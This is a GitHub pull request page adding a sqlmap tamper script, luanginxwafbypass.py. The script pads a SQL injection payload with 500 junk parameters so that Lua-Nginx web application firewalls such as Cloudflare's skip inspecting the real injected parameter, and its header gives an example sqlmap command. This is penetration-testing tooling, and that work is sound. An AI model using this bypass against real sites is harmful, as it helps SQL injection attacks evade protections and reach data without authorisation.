Skip to content

Lua-Nginx WAFs Bypass #3316

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
stamparm merged 6 commits into from
Oct 26, 2018
Merged

Lua-Nginx WAFs Bypass #3316

Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
8876a96
Lua-Nginx WAFs Bypass
xtormin Oct 25, 2018
bbd7ba9
Update luanginxwafbypass.py
xtormin Oct 25, 2018
c70818b
Update luanginxwafbypass.py
xtormin Oct 25, 2018
15a77ef
Update luanginxwafbypass.py
xtormin Oct 25, 2018
c63d1e7
Update luanginxwafbypass.py
xtormin Oct 25, 2018
3ab723f
Update luanginxwafbypass.py
xtormin Oct 26, 2018
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
51 changes: 51 additions & 0 deletions tamper/luanginxwafbypass.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

'''
[+] LUA-Nginx WAFs Bypass (Cloudflare)
Lua-Nginx WAFs doesn't support processing for more than 100 parameters.

Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter
Required options: --skip-urlencode, -p
'''

import sys
import string
import random
from lib.core.enums import PRIORITY
from lib.core.data import conf
__priority__ = PRIORITY.HIGHEST

''' Random parameter'''
def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits):
output = ''.join(random.choice(chars) for _ in range(size))
return output

''' Tamper '''
def tamper(payload, **kwargs):
try:
headers = kwargs.get("headers", {})
randomParameter = randomParameterGenerator()
parameter = conf["testParameter"][0]

if not parameter:
print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)"
sys.exit(0)

if conf["skipUrlEncode"] != True:
print "\n[-] [ERROR] --skip-urlencode option must be activated"
sys.exit(0)

# Add 500 parameters to payload
luaBypass = ("&" + randomParameter + "=")*500 + "&"
outputPayload = luaBypass + parameter + "=" + payload

return outputPayload
except Exception as error:
print error
return None